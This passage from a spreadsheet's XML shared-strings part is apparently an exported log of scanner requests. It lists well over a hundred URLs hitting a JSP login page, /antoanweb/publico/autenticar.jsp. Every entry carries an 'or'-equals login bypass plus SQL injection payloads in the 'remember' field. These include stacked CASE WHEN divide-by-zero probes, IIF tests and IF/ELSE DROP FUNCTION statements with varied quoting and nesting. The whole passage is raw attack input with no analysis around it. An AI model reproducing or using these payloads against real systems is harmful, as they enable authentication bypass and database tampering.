    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,iif(5522=3685,,1/0)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5905&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5503);select(casewhen(151=9944)then151else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8544);select(casewhen(4068=4068)then4068else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-181);select(casewhen(4468=4111)then4468else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9152&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6261');select(casewhen(9040=9860)then9040else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3691');select(casewhen(4068=4068)then4068else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2124');select(casewhen(460=5642)then460else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5987&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4403';select(casewhen(9594=1631)then9594else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3808';select(casewhen(4068=4068)then4068else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7590';select(casewhen(1778=3278)then1778else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4580&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6083";select(casewhen(9671=8421)then9671else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-365";select(casewhen(4068=4068)then4068else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4892";select(casewhen(939=2496)then939else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8597&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5898);select(casewhen(5309=442)then5309else1/(select0)end);--and(7641=7641&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2353);select(casewhen(4068=4068)then4068else1/(select0)end);--and(6188=6188&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8746);select(casewhen(8307=2595)then8307else1/(select0)end);--and(1599=1599&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7614&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8580));select(casewhen(9496=8227)then9496else1/(select0)end);--and((9560=9560&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9011));select(casewhen(4068=4068)then4068else1/(select0)end);--and((2081=2081&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3997));select(casewhen(6559=6917)then6559else1/(select0)end);--and((5260=5260&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9176&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3069)));select(casewhen(2031=6325)then2031else1/(select0)end);--and(((5989=5989&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4850)));select(casewhen(4068=4068)then4068else1/(select0)end);--and(((9954=9954&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8948)));select(casewhen(572=955)then572else1/(select0)end);--and(((9842=9842&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8358&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1689;select(casewhen(8085=7378)then8085else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1823;select(casewhen(4068=4068)then4068else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1567;select(casewhen(3911=5329)then3911else1/(select0)end);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6117&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7457');select(casewhen(1281=2732)then1281else1/(select0)end);--and('hbkl'='hbkl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4532');select(casewhen(4068=4068)then4068else1/(select0)end);--and('eimx'='eimx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7231');select(casewhen(8004=6633)then8004else1/(select0)end);--and('doav'='doav&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5632&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6594'));select(casewhen(6798=4525)then6798else1/(select0)end);--and(('ppnp'='ppnp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3461'));select(casewhen(4068=4068)then4068else1/(select0)end);--and(('ywqc'='ywqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3876'));select(casewhen(620=7464)then620else1/(select0)end);--and(('dlkg'='dlkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7745&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8872')));select(casewhen(9420=3599)then9420else1/(select0)end);--and((('iwds'='iwds&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8594')));select(casewhen(4068=4068)then4068else1/(select0)end);--and((('eiue'='eiue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2060')));select(casewhen(7964=6687)then7964else1/(select0)end);--and((('vcfy'='vcfy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9350&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7499';select(casewhen(3836=7401)then3836else1/(select0)end);--and'vtdg'='vtdg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7833';select(casewhen(4068=4068)then4068else1/(select0)end);--and'ralz'='ralz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-967';select(casewhen(2353=9782)then2353else1/(select0)end);--and'ionm'='ionm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5153&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6575');select(casewhen(5226=7434)then5226else1/(select0)end);--and('muuw'like'muuw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-941');select(casewhen(4068=4068)then4068else1/(select0)end);--and('ielq'like'ielq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6702');select(casewhen(9322=614)then9322else1/(select0)end);--and('qzfy'like'qzfy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8183&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2545'));select(casewhen(1814=9399)then1814else1/(select0)end);--and(('qtsr'like'qtsr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2134'));select(casewhen(4068=4068)then4068else1/(select0)end);--and(('qpuh'like'qpuh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-338'));select(casewhen(6129=1282)then6129else1/(select0)end);--and(('wwrx'like'wwrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9351&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9169')));select(casewhen(5736=7912)then5736else1/(select0)end);--and((('uwnd'like'uwnd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4658')));select(casewhen(4068=4068)then4068else1/(select0)end);--and((('iwhc'like'iwhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7302')));select(casewhen(8622=7688)then8622else1/(select0)end);--and((('mzmj'like'mzmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6897&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2748';select(casewhen(3568=9513)then3568else1/(select0)end);--and'exqq'like'exqq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3727';select(casewhen(4068=4068)then4068else1/(select0)end);--and'hyrx'like'hyrx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2988';select(casewhen(1633=1383)then1633else1/(select0)end);--and'pknk'like'pknk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9409&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5928");select(casewhen(7841=9794)then7841else1/(select0)end);--and("zbox"="zbox&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1313");select(casewhen(4068=4068)then4068else1/(select0)end);--and("cusw"="cusw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3280");select(casewhen(5769=4887)then5769else1/(select0)end);--and("vraa"="vraa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1839&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4358"));select(casewhen(1260=6359)then1260else1/(select0)end);--and(("kmxz"="kmxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6279"));select(casewhen(4068=4068)then4068else1/(select0)end);--and(("fuqy"="fuqy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7033"));select(casewhen(7858=9961)then7858else1/(select0)end);--and(("yqev"="yqev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3177&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2516")));select(casewhen(1378=710)then1378else1/(select0)end);--and((("obof"="obof&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4708")));select(casewhen(4068=4068)then4068else1/(select0)end);--and((("kxhc"="kxhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1527")));select(casewhen(2611=2287)then2611else1/(select0)end);--and((("nwxd"="nwxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6016&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2020";select(casewhen(3706=6650)then3706else1/(select0)end);--and"atgw"="atgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5626";select(casewhen(4068=4068)then4068else1/(select0)end);--and"sehc"="sehc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8703";select(casewhen(7445=1878)then7445else1/(select0)end);--and"jrsc"="jrsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-625&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2879");select(casewhen(7163=77)then7163else1/(select0)end);--and("nedq"like"nedq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6541");select(casewhen(4068=4068)then4068else1/(select0)end);--and("lfaz"like"lfaz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9032");select(casewhen(7920=7462)then7920else1/(select0)end);--and("apij"like"apij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-643&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4086"));select(casewhen(4688=9092)then4688else1/(select0)end);--and(("wfrb"like"wfrb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-608"));select(casewhen(4068=4068)then4068else1/(select0)end);--and(("kbqp"like"kbqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5662"));select(casewhen(9699=2693)then9699else1/(select0)end);--and(("czcu"like"czcu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1857&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5191")));select(casewhen(3197=2597)then3197else1/(select0)end);--and((("ltjz"like"ltjz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1037")));select(casewhen(4068=4068)then4068else1/(select0)end);--and((("jltr"like"jltr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1093")));select(casewhen(6727=5759)then6727else1/(select0)end);--and((("flnc"like"flnc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7094&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8948";select(casewhen(9267=4971)then9267else1/(select0)end);--and"bzpk"like"bzpk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8204";select(casewhen(4068=4068)then4068else1/(select0)end);--and"rxnp"like"rxnp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8576";select(casewhen(2369=7299)then2369else1/(select0)end);--and"auew"like"auew&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(2481=2532)select2481elsedropfunctionhmlk;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(5592=5592)select5592elsedropfunctiontgls;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(756=5213)select756elsedropfunctionwrwj;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(2701=954)select2701elsedropfunctioncstw;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(5592=5592)select5592elsedropfunctiontgls;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(7108=6737)select7108elsedropfunctionjuje;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(2166=7498)select2166elsedropfunctionqing;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(5592=5592)select5592elsedropfunctiontgls;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(3958=9442)select3958elsedropfunctiondqrq;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(2185=9972)select2185elsedropfunctionalwl;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(5592=5592)select5592elsedropfunctiontgls;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";if(5209=6397)select5209elsedropfunctionmpdr;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(6657=9758)select6657elsedropfunctiondvst;--and(4552=4552&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(5592=5592)select5592elsedropfunctiontgls;--and(1669=1669&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);if(1100=3499)select1100elsedropfunctionizxf;--and(2689=2689&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if(6645=5630)select6645elsedropfunctiondybx;--and((3920=3920&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if(5592=5592)select5592elsedropfunctiontgls;--and((5500=5500&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));if(771=5017)select771elsedropfunctionbyvq;--and((4422=4422&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if(6442=2733)select6442elsedropfunctioncqhi;--and(((7552=7552&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if(5592=5592)select5592elsedropfunctiontgls;--and(((8441=8441&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));if(6637=1008)select6637elsedropfunctionijzb;--and(((1626=1626&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if(601=4839)select601elsedropfunctionmzjw;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if(5592=5592)select5592elsedropfunctiontgls;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;if(566=9680)select566elsedropfunctioneftq;--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(4085=2200)select4085elsedropfunctionqama;--and('taiy'='taiy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(5592=5592)select5592elsedropfunctiontgls;--and('bcrh'='bcrh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(1023=5912)select1023elsedropfunctionzdlh;--and('hxsp'='hxsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(9381=5839)select9381elsedropfunctionhndi;--and(('ghfe'='ghfe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(5592=5592)select5592elsedropfunctiontgls;--and(('uaka'='uaka&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(2527=8381)select2527elsedropfunctionmyou;--and(('avlz'='avlz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(3594=187)select3594elsedropfunctionhagq;--and((('kzjj'='kzjj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(5592=5592)select5592elsedropfunctiontgls;--and((('jpmo'='jpmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(9186=8271)select9186elsedropfunctionxiux;--and((('caqd'='caqd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(4989=7988)select4989elsedropfunctionrnjw;--and'xgvq'='xgvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(5592=5592)select5592elsedropfunctiontgls;--and'dpar'='dpar&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';if(3438=2399)select3438elsedropfunctionvrrd;--and'uzfu'='uzfu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(9306=3727)select9306elsedropfunctionbffl;--and('lofs'like'lofs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(5592=5592)select5592elsedropfunctiontgls;--and('jwpv'like'jwpv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');if(6769=7336)select6769elsedropfunctionzeqd;--and('vram'like'vram&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(8624=845)select8624elsedropfunctionqtwc;--and(('jtci'like'jtci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(5592=5592)select5592elsedropfunctiontgls;--and(('dgem'like'dgem&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));if(6402=2058)select6402elsedropfunctiongkgn;--and(('degk'like'degk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(8192=3603)select8192elsedropfunctionhohh;--and((('btsn'like'btsn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));if(5592=5592)select5592elsedropfunctiontgls;--and((('fagk'like'fagk&amp;modo=entrar</t>
